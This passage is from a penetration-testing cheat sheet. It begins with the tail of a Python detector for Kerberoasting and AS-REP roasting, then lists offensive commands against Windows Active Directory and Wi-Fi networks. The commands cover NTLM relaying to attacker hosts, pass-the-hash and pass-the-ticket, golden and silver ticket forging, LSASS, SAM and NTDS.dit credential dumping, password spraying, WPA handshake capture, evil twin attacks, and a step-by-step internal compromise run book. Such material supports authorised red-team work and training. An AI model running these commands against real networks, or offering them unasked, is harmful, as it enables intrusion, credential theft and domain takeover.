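{"id": 4769, "time": "2024-03-01T09:01:02", "TargetUserName": "notanadmin@EXAMPLE.LOCAL", "ServiceName": "svc-web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.77"}
{"id": 4769, "time": "2024-03-01T09:01:03", "TargetUserName": "notanadmin@EXAMPLE.LOCAL", "ServiceName": "svc-backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.77"}
{"id": 4769, "time": "2024-03-01T10:30:00", "TargetUserName": "alice@EXAMPLE.LOCAL", "ServiceName": "svc-sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.31"}
"""


def is_machine_account(name: str) -> bool:
    """Computer accounts end in '$'; their passwords are long and random, so skip them."""
    return name.strip().endswith("$")


def parse_events(lines: List[str]) -> List[Dict]:
    events = []
    for line in lines:
        if line.strip():
            ev = json.loads(line)
            ev["time"] = datetime.fromisoformat(ev["time"])
            events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_asrep_roast(events: List[Dict]) -> List[Dict]:
    """Successful 4768 with no pre-authentication and an RC4 ticket."""
    return [e for e in events
            if e["id"] == 4768 and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and e.get("Status") == "0x0"]


def find_kerberoast(events: List[Dict]) -> List[Dict]:
    """One requester obtaining RC4 tickets for several user-owned SPNs within the window."""
    by_requester = defaultdict(list)
    for e in events:
        if (e["id"] == 4769 and e.get("Status") == "0x0"
                and e.get("TicketEncryptionType", "").lower() == RC4_HMAC
                and not is_machine_account(e["ServiceName"])):
            by_requester[e["TargetUserName"]].append(e)
    alerts = []
    for user, reqs in by_requester.items():        # reqs are already time-ordered
        for i, first in enumerate(reqs):
            window = [r for r in reqs[i:] if r["time"] - first["time"] <= KERBEROAST_WINDOW]
            services = sorted({r["ServiceName"] for r in window})
            if len(services) >= KERBEROAST_MIN_SERVICES:
                alerts.append({"user": user, "from": first["IpAddress"],
                               "start": first["time"].isoformat(), "services": services})
                break                                # one alert per requester is enough
    return alerts


def run_detections(lines: List[str]) -> Dict[str, List[Dict]]:
    events = parse_events(lines)
    return {"asrep_roast": find_asrep_roast(events), "kerberoast": find_kerberoast(events)}


if __name__ == "__main__":
    for kind, hits in run_detections(SAMPLE_LOG.splitlines()).items():
        for hit in hits:
            print(kind, hit)
```

A single RC4 service ticket is common on networks that still allow RC4, which is why the rule keys on the burst; removing RC4 from service accounts' msDS-SupportedEncryptionTypes and dropping DONT_REQ_PREAUTH removes the signal at the source.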

Extract GPP Credentials

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb DC_IP_ADDR -u notanadmin -p Password123 -d domain -M gpp_password

MS Exchange – Domain Escalation


https://github.com/dirkjanm/PrivExchange

ntlmrelayx.py -t ldap://dc.example.local --escalate-user notanadmin

python privexchange.py -ah attacker.example.local exchange.example.local -u notanadmin -d example.local

secretsdump.py example.local/[email protected] -just-dc

Escalate via MSSQL

1) crackmapexec mssql 10.10.10.1 -u username -p password --local-auth -M mssql_priv

2) crackmapexec mssql 10.10.10.1 -u username -p password --local-auth -M mssql_priv -o ACTION=privesc

3) crackmapexec mssql 10.10.10.1 -u username -p password --local-auth -x whoami

4) crackmapexec mssql 10.10.10.1 -u username -p password --local-auth -M mssql_priv -o ACTION=rollback

Active Directory Low Hanging Fruit Check


https://www.pingcastle.com/download/

pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

WINDOWS HORIZONTAL PRIVILEGE ESCALATION

LOGGED IN USERS

Crackmapexec

crackmapexec smb 192.168.1.0/24 -u username -p Password123 -d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

pingcastle.exe --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>

Bloodhound
https://github.com/BloodHoundAD/BloodHound

neo4j start

python bloodhound.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc <DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound Python
https://github.com/fox-it/BloodHound.py.git

python3 bloodhound.py -d <domain> -u username -p password -c All

Bloodhound – LSASSY

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

REMOTE MIMIKATZ/LSA DUMPS FROM LOCAL ADMIN

Dump LSA secrets

Crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb targets.txt -u localadmin -p Password123 -d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

LSASSY

crackmapexec smb <target> -u administrator -p pass -M lsassy

Dump with Mimikatz


Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
https://github.com/gojhonny/CredCrack

credcrack.py -f targets.txt -d domain -u localadmin -l <target>

PASS THE HASH (PTH)

Dump SAM file (1)
Crackmapexec

crackmapexec smb targets.txt -u localadmin -p Password123 -d domain --sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOST, SMBUser, SMBPass, SMBdomain, run

Pass the Hash (2)


Crackmapexec

crackmapexec smb targets.txt -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C --local-auth

Metasploit

use exploit/windows/smb/psexec

Set: RHOST, SMBUser, SMBPass LM:NTLM, run

xfreerdp

xfreerdp /u:administrator /d:test.local /pth:7337532fd3bf3abfaef5a9b5bb05a9d8 /v:192.168.1.101 /size:800x600

PASS THE KEY (PTK)

Request The TGT via Linux (1)


Impacket
https://github.com/SecureAuthCorp/impacket.git
#Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/GhostPack/Rubeus.git
#Request the TGT with hash

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)

#Execute a cmd on the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

PASS THE TICKET (PTT)


Harvest tickets on Linux host (1)

grep default_ccache_name /etc/krb5.conf

OR

grep default_ccache_name /tmp/krb5cc_%{uid}

OR

#If user is root Tickey will inject into other user processes. Must be in a reachable folder.

https://github.com/TarlogicSecurity/tickey.git

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Harvest tickets from Windows (1)
Mimikatz
https://github.com/gentilkiwi/mimikatz

mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
https://github.com/GhostPack/Rubeus.git

.\Rubeus.exe dump

Inject Ticket via Windows (2)


Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

PsExec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

SILVER TICKET

Request The TGT via Linux (1)


https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz



mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

GOLDEN TICKET
Request The TGT via Linux (1)
https://github.com/SecureAuthCorp/impacket.git

#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR



python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/gentilkiwi/mimikatz

#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd



AUTOMATE LOCAL ADMIN TO DOMAIN ADMIN (NOISY)
Initiate Deathstar
https://github.com/EmpireProject/Empire

python empire --rest --username empireadmin --password Password123

https://github.com/byt3bl33d3r/DeathStar

DeathStar.py

Execute DeathStar

crackmapexec smb targets.txt -u username -p password -d domain -M empire_exec -o LISTENER=DeathStar



CREDENTIAL PILLAGING



EXTRACT SAM & CACHED HASHES MANUALLY

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

EXTRACT NTDS.DIT HASHES MANUALLY

Manual NTDS.dit Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

Manual NTDS.dit Extraction using ntdsutil (1)

ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct NTDS.dit into readable hashes (2)

impacket-secretsdump -ntds ./ntds.dit -system ./SYSTEM LOCAL -outputfile customer

EXTRACT NTDS.DIT HASHES (AUTOMATED)

Dump NTDS.dit with Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -d domain --ntds



EXTRACT USERS WITHOUT PASSWORD REQUIREMENT
No Password Required

crackmapexec ldap example.local -u username -p password --kdcHost DC_IP_ADDR --password-not-required

FIND PLAINTEXT PASSWORDS

Automate searching for credentials through email


https://github.com/dafthack/MailSniper

#Searching with non-admin privs

Invoke-SelfSearch -Mailbox [email protected]

#Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS Shares


https://github.com/blacklanternsecurity/MANSPIDER

manspider 192.168.0.0/24 -f passw -d example.local -u bob -p Password

https://github.com/SpiderLabs/scavenger

python3 scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

OR

python3 scavenger.py smb --target iplist --username administrator --password Password123 --domain
test.local --overwrite

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec smb 10.10.10.10 -u 'username' -p 'password' -M spider_plus

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP



https://github.com/Arvanaghi/SessionGopher

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL targets.txt -u domain.com\admin -p Password123 -o

Search passwords in commonly-used software


https://github.com/AlessandroZ/LaZagne/releases

Drop laZagne.exe all on victim

Metasploit Post Exploitation

use post/windows/gather/*

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

dir /b /s sysprep.inf

#Windows Autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern password



Extract passwords from PST File
Non-Password protected File
https://github.com/srnsw/xena/tree/master/xena/dist/winx86

readpst.exe -D -S -o output -t ea mail.pst

findstr /s /i /m "password" *.*

Password Protected PST File


https://github.com/righettod/pst-digger

java -jar pst-digger.jar -a -f "C:\Users\xxx\my.pst" -i -k "login|password" -o TEST01

Stored User Descriptions


#Sometimes there are passwords or keys stored in descriptions

crackmapexec ldap example.local -u username -p password --kdcHost DC_IP_ADDR -M get-desc-users

OR

ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword

WPA PSK STRING EXTRACTION


Windows

netsh wlan show profiles



netsh wlan show profile name=WIFI_NAME key=clear

Look for the “Key Content” line, the cleartext password will be there.

OR

crackmapexec smb <ip> -u user -p pass -M wireless

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/wireless-settings.conf



WIRELESS



WPA/WPA2 HASH CAPTURE WITH USERS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon

OR

airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d ff:ff:ff:ff:ff:ff -w capture

#*-c = channel *-d=BSSID

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 wlan0mon

#*-a=BSSID *-c=client

WPA/WPA2 HASH CAPTURE WITHOUT USERS (PMKID)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
https://github.com/derv82/wifite2

./Wifite.py



Run manually
https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">filter.txt

hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

WPS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

ENTERPRISE WIRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)



4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
https://github.com/s0lst1c3/eaphammer

./eaphammer --eap-spray -I wlan0 -e SSID_EXAMPLE --user-list users.txt --password Summer2019

Password Reuse

If certificates are not validated, use a compromised AD username and password.

EVIL TWIN (SOCIAL ENGINEERING)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

OPEN WIRELESS
Nmap internal IP addresses and or hostnames.

WEP WIRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR



./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)



METHODOLOGY



INTERNAL RUN BOOK FOR MOST WINDOWS NETWORKS (QUICK ACCESS)

Asset discovery is generally time consuming, slow, and produces a lot of network traffic. I often spend the
first 30 min of my time running responder and MITM6 in an attempt to gain credentials. I then move into
authenticated asset discovery.
1) Look for very quick wins before anything else. If these attacks fail, move on to #2.
crackmapexec smb <Domain Controller> -u '' -p '' -M petitpotam
crackmapexec smb <Domain Controller> -u '' -p '' -M zerologon
crackmapexec smb <Domain Controller> -u '' -p '' --users -o users.txt
a. cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
i. ./hashcat.bin -m 18200 -O -w 3 ./output.txt /opt/rockyou.txt
b. wget http://weakpasswords.net -O weakpass.txt
c. cme smb <Domain Controller> -u '' -p '' --pass-pol
d. spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
crackmapexec smb <subnet> -u '' -p '' -M ms17-010

2) Gather hashes. Careful, this can cause certificate issues, among other things, and potentially
DoS users.
responder -I eth0 -Pdv
a. sort -u -t: -k1,1 /usr/share/responder/logs/*.txt

3) Legacy services may be disabled. mitm6 may produce more hashes. I like to use the IP range of
my local subnet. Careful, this can cause certificate issues, among other things, and potentially
DoS users.
crackmapexec smb <subnet> --gen-relay-list relaylistOutputFilename.txt
mitm6 -i eth0 -d example.local
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relaylistOutputFilename.txt -smb2support
a. Check the local directory for hashes and SAM dumps. If a SAM hash is obtained, Pass the
Hash to other domain PCs.
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
crackmapexec smb <subnet> -u admin -H blahblah -lsa



b. cat /root/.cme/logs/*.secrets |sort -u
crackmapexec smb <subnet> -u admin -H blahblah -M lsassy

4) Crack the hashes. Most of the time you will get NTLMv2 (5600) hashes in modern
environments. If the hashes don't crack, continue relaying (preferably off hours). SMB
signing may be enabled.
./hashcat64.bin -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/all_wordlists.txt
./hashcat64.bin -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/rockyou.txt -r /usr/share/hashcat/rules/dive.rule

#If passwords are cracked, start moving laterally.


5) Figure out the role of each account. We are looking for admins.
crackmapexec ldap example.local -u username -p password --admin-count
OR
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>
OR
bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
a. cat users.json|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

6) Are the creds Admin?
a. Are the creds LOCAL Admin?
Automated
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
Manual
i. I like to make a quick list of hosts to target.
crackmapexec ldap <Domain Controller> -u admin -p password -M subnets
ii. Dump SAM file in an attempt to pass the hash.
crackmapexec smb AD_Computers.txt -u admin -p password -sam



1) Once a hash is obtained, Pass the Hash to other domain PCs.
crackmapexec smb AD_Computers.txt -u admin -H blahblah -lsa
cat /root/.cme/logs/*.secrets |sort -u
iii. Dump LSASS in an attempt to escalate privileges.
crackmapexec smb AD_Computers.txt -u admin -p password -lsa
cat /root/.cme/logs/*.secrets |sort -u
iv. Dump LSASS in an attempt to escalate privileges. Note, this often returns more
creds, but they are not stored in the DB or in logs.
crackmapexec smb AD_Computers.txt -u admin -p password -M lsassy
b. Are the creds Domain Admin?
crackmapexec smb example.local -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb example.local -u UserNAme -p 'PASSWORDHERE' --ntds vss

7) Are the creds a basic user?
a. Impersonate Domain Admin with noPAC
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac

b. Try the printer bug attack.
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M spooler
i. python3 ntlmrelayx.py -t DCSYNC://dc1.example.local -smb2support
ii. python3 printerbug.py -no-ping example.local/username:[email protected] <ATTACKERIP>

c. Look for passwords in user descriptions.
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M user-desc
OR
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M get-desc-users
d. Make a list of users to password spray. Make sure password policy is followed.
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR



bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
cat users.json|jq -r '.users[] | .Properties |.name' |cut -d @ -f1
i. Execute password spray
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OR
crackmapexec smb example.local -u users.txt -p Summer2022!
e. Look for privilege escalation attack vectors via AD.
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME>@example.local --password <PASSWORD>
#PingCastle will provide a lot of results. These are the most common.
i. ASREPRoast
crackmapexec ldap <Domain Controller> -u users.txt -p '' --asreproast output.txt
crackmapexec ldap <Domain Controller> -u username -p pass --asreproast output.txt
ii. Kerberoast
crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting output.txt
iii. Find autologon information
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_autologin
iv. Abuse AD CS
certipy 'example/john:[email protected]' auto
v. GPP Passwords.
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_password

8) If you can’t crack the hashes, Pass the Hash from the SMB relay attack.
a. Basic users can create computer accounts. This can help gain a foothold into AD.
mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://example.local --add-computer
b. Combine mitm6, ntlmrelayx and RBCD to abuse AD defaults.



mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access
getST.py -spn cifs/example.local example.local/NEW_PC_NAME\$ -impersonate admin
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass admin.ccache
c. Relay an SMB authentication request to the DC. If it's a DA account and vulnerable to CVE-2019-1019, it will make a new DA account.
mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd
ntlmrelayx.py -t ldaps://example.local -smb2support --remove-mic

9) Find the subnets users/servers are on.
bloodhound-python -u username -p Password123 -c all
cat computers.json|jq -r '.computers[] | .Properties |.name' > computers.txt
nmap -p445 -Pn -oG - -iL computers.txt | awk '/open/{print $2}' | cut -d '.' -f1,2,3 |sort -u |sed 's/$/.0\/24/'

10) Dump AD subnets.
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M subnets
OR
.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
OR
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>
PingCastle.exe --hc-conso

11) Dump DNS records and find internal records to avoid going out of scope.
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M enum_dns
OR
adidnsdump -u DOMAIN\\notanadmin <target>



OR
ADCollector.exe --Domain domain.local --Username user --Password pass --Choice 1
12) Pillage files for sensitive data to show impact.
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd
OR
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
a. Dump all filenames to your local drive
crackmapexec smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false
b. Browse to the SMB share. Download for impact.
smbclient '//PC.example.local/C$' -U Administrator --pw-nt-hash blahblahblah -W example.local
OR
#Prompt for password.
smbclient '//PC.example.local/C$' -U Administrator -W example.local
#ls - lists files
#cd - change directories
#mget - download file(s)

13) Look for default creds on network equipment and applications.
cat subnets.txt | naabu -silent | httpx -silent -c 500 | nuclei -severity critical,high,medium
AND/OR
nmap --script http-default-accounts -iL subnets.txt
AND/OR
cat hosts.txt | httpx | ffuf -w - -u FUZZ -mr "assword"

14) Kick off a vulnerability scanner to fill any gaps and exploit as needed.
#Need to find low hanging fruit quickly?
Run the Nessus file through https://github.com/averagesecurityguy/scripts/blob/master/scan/scan.py



a. Check for things that Nessus can't; these may be risks that did not need to be exploited.
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M dfscoerce
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M shadowcoerce
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M petitpotam
crackmapexec ldap <Domain Controller IP> -u Administrator -p 'Password123!' -M ldap-checker --kdcHost example.local
crackmapexec ldap <Domain Controller> -u Administrator -p 'Password123!' -M ldap-signing

15) Manually look at each application through a screenshot tool. Check for default creds. Google
vendor passwords if you have internet access.
a. Screenshot web applications
eyewitness -x file.nessus --active-scan --web
b. List web apps with a credential page
cat hosts.txt | httpx -threads 500 -ms "assword"



Thank You for Your Contribution
• @Derek_Carlin
• @_dirkjan
• @byt3bl33d3r
• Rjohnsondev
• @netbiosX
• AlessandroZ
• @arvanaghi
• Nikallass
• @agsolino
• @PythonResponder
• @gentilkiwi
• @harmj0y
• @mysmartlogon
• Atom
• @xerosecurity
• @ztgrace
• Folks at SySS Research
• Contributors to Metasploit
• @bonsaiviking
• @ErrataRob
• x90skysn3k
• @DanHMcInerney
• @derv82
• @s0lst1c3
• @mpgn_x64
• @nixfreax
